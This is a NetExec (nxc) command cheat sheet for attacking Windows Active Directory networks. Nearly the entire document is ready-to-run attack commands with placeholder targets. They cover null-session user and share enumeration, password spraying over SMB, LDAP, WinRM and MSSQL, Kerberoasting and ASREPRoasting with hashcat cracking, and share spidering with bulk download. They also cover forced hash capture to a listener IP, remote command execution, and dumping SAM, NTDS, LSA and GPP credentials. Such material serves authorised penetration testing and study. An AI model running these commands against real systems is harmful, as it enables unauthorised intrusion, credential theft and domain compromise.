No-Credential Enumeration
SMB host discovery — identify live hosts and signing status
nxc smb <CIDR>
Generate relay target list — hosts with signing disabled
nxc smb <CIDR> --gen-relay-list relay.txt
Enumerate password policy (null session)
nxc smb <DC_IP> -u '' -p '' --pass-pol
Enumerate users (null session)
nxc smb <DC_IP> -u '' -p '' --users
Enumerate shares (null or guest)
nxc smb <DC_IP> -u '' -p '' --shares
nxc smb <DC_IP> -u guest -p '' --shares
RID brute-force — enumerate users without creds
nxc smb <DC_IP> -u '' -p '' --rid-brute
ASREPRoast without credentials
nxc ldap <DC_FQDN> -u users.txt -p '' --asreproast asreproast.out
Password Spraying
Spray a single password against a user list (SMB)
nxc smb <DC_IP> -u users.txt -p '<PASSWORD>' --continue-on-success
Spray LDAP
nxc ldap <DC_FQDN> -u users.txt -p '<PASSWORD>' --continue-on-success
Spray WinRM — paired list, one attempt per user
nxc winrm <TARGET> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
Spray MSSQL (domain account)
nxc mssql <TARGET> -u users.txt -p '<PASSWORD>' -d <DOMAIN>
Enumeration With Credentials
Enumerate domain users and groups
nxc smb <DC_IP> -u <USER> -p '<PASS>' --users --groups
Enumerate shares
nxc smb <TARGET> -u <USER> -p '<PASS>' --shares
Enumerate logged-on users
nxc smb <TARGET> -u <USER> -p '<PASS>' --loggedon-users
Enumerate GMSA passwords
nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --gmsa
Enumerate LAPS
nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' -M laps
Enumerate accounts with AdminCount=1
nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --admin-count
Enumerate accounts trusted for delegation
nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --trusted-for-delegation
Get domain SID
nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --get-sid
Read ACLs with daclread
nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' -M daclread -o TARGET=<SAMACCOUNTNAME> ACTION=read
Find accounts with DCSync rights
nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' -M daclread -o TARGET_DN="DC=<DOMAIN>,DC=<TLD>" ACTION=read RIGHTS=DCSync
Roasting
Kerberoast
nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --kerberoasting kerberoasting.out
hashcat -m 13100 kerberoasting.out /usr/share/wordlists/rockyou.txt
ASREPRoast
nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --asreproast asreproast.out
hashcat -m 18200 asreproast.out /usr/share/wordlists/rockyou.txt
Share Spidering
List all files on a share (exclude noisy shares)
nxc smb <TARGET> -u <USER> -p '<PASS>' -M spider_plus -o EXCLUDE_DIR=IPC$,print$,NETLOGON,SYSVOL
Download all accessible files from a share
nxc smb <TARGET> -u <USER> -p '<PASS>' -M spider_plus -o EXCLUDE_DIR=ADMIN$,IPC$,print$,NETLOGON,SYSVOL READ_ONLY=false
Search a share for file pattern or keyword
nxc smb <TARGET> -u <USER> -p '<PASS>' --spider <SHARE> --pattern txt
nxc smb <TARGET> -u <USER> -p '<PASS>' --spider <SHARE> --content --regex <KEYWORD>
Download a file from a share
nxc smb <TARGET> -u <USER> -p '<PASS>' --share <SHARE> --get-file <REMOTE_FILE> <LOCAL_FILE>
Forced Hash Capture — Slinky
nxc smb <TARGET> -u <USER> -p '<PASS>' -M slinky -o SERVER=<LISTENER_IP> NAME=<LINK_NAME>
# cleanup:
nxc smb <TARGET> -u <USER> -p '<PASS>' -M slinky -o SERVER=<LISTENER_IP> NAME=<LINK_NAME> CLEANUP=YES
Command Execution
CMD via SMB (requires admin)
nxc smb <TARGET> -u <USER> -p '<PASS>' -x "<COMMAND>"
PowerShell via SMB
nxc smb <TARGET> -u <USER> -p '<PASS>' -X "<PS_COMMAND>"
CMD via WinRM
nxc winrm <TARGET> -u <USER> -p '<PASS>' -x "<COMMAND>"
Credential Dumping
Dump SAM (local hashes)
nxc smb <TARGET> -u <USER> -p '<PASS>' --sam
Dump NTDS (domain hashes — run against DC)
nxc smb <DC_IP> -u <USER> -p '<PASS>' --ntds
Dump LSA secrets (cached domain creds)
nxc smb <TARGET> -u <USER> -p '<PASS>' --lsa
Dump via lsassy module
nxc smb <TARGET> -u <USER> -p '<PASS>' -M lsassy
GPO Credential Modules
nxc smb <TARGET> -u <USER> -p '<PASS>' -M gpp_password
nxc smb <TARGET> -u <USER> -p '<PASS>' -M gpp_autologin
Key Flags
| Flag | Description |
|---|
-u | Username or file |
-p | Password or file |
--local-auth | Authenticate as local account |
--no-bruteforce | Pair user:pass from lists (no cross-product) |
--continue-on-success | Keep spraying after a hit |
-x | Execute CMD command |
-X | Execute PowerShell command |
-M <module> | Run a module |
-o KEY=VALUE | Module options |
-L | List modules for a protocol |